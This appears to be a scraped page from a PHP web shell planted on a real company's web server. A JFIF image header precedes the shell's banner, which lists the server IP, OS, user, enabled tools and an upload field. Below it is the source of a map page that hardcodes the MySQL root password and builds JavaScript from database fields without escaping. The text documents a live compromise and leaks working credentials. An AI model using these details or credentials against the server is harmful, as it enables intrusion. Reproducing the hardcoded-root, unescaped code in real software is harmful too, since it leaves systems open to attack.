????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.37 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.se/go/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Astacus - GO - Gebouw kaart</title>
<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?sensor=false"></script>
<script type="text/javascript" src="js/script.js"></script>
<meta http-equiv='cache-control' content='no-cache'>
<meta http-equiv='expires' content='0'>
<meta http-equiv='pragma' content='no-cache'>
<?php
$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("astacus_web");
$sql = "SELECT * FROM tblLaserProjectsGo WHERE visible = 1";
$JSON = "var JSON_projects = [";
$result = mysql_query($sql);
while ($row = mysql_fetch_assoc($result)){
$name = $row['Name'];
$address = $row['Address'];
$poslatlong = $row['PosLatLong'];
$type = $row['Type'];
$description = $row['Description'];
$photo = $row['Photo'];
$truview = $row['Truview'];
$dwg = $row['DWG/PDF'];
$customer = $row['Customer'];
$obj = '[{"Name":"'.$name.'"},{"Address":"'.$address.'"},{"PosLatLong":"'.$poslatlong.'"},{"Type":"'.$type.'"},{"Description":"'.$description.'"},{"Photo":"'.$photo.'"},{"TruView":"'.$truview.'"},{"Dwg":"'.$dwg.'"},{"Customer":"'.$customer.'"},],';
//$obj= iconv("ISO-8859-1","UTF-8",$obj);
$JSON .= $obj;
}
$JSON = substr($JSON,0,strlen($JSON)-1);
$JSON .= "];";
echo("<script>".$JSON."</script>");
?>
<style type="text/css">
html,body{
margin:0;
padding:0;
height:100%;
width:100%;
font-family:Arial, Helvetica, sans-serif;
font-size:12px;
}
#top_menu{
height:80px;
width:100%;
z-index:1;
position:absolute;
}
.text{
font-family:Arial, Helvetica, sans-serif;
font-size:14px;
color:#ffd200;
}
#map_canvas{
height:100%;
width:100%;
margin-top:70px;
overflow:hidden;
z-index:0;
position:absolute;
}
#right_menu_tab1 {
position:fixed;
right:6px;
top:80px;
width:310px;
height:863px;
z-index:2;
visibility:visible;
}
</style>
</head>
<body onload="initialize();">
<div id="top_menu" ><table width="100%" height="76" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor="#c60751"> <img src="logo.png" width="75" height="64" /></td>
<td align="right" bgcolor="#c60751"> </td>
</tr>
</table>
</div>
<div id="map_canvas" >Kartan laddas...</div>
</body>
</html>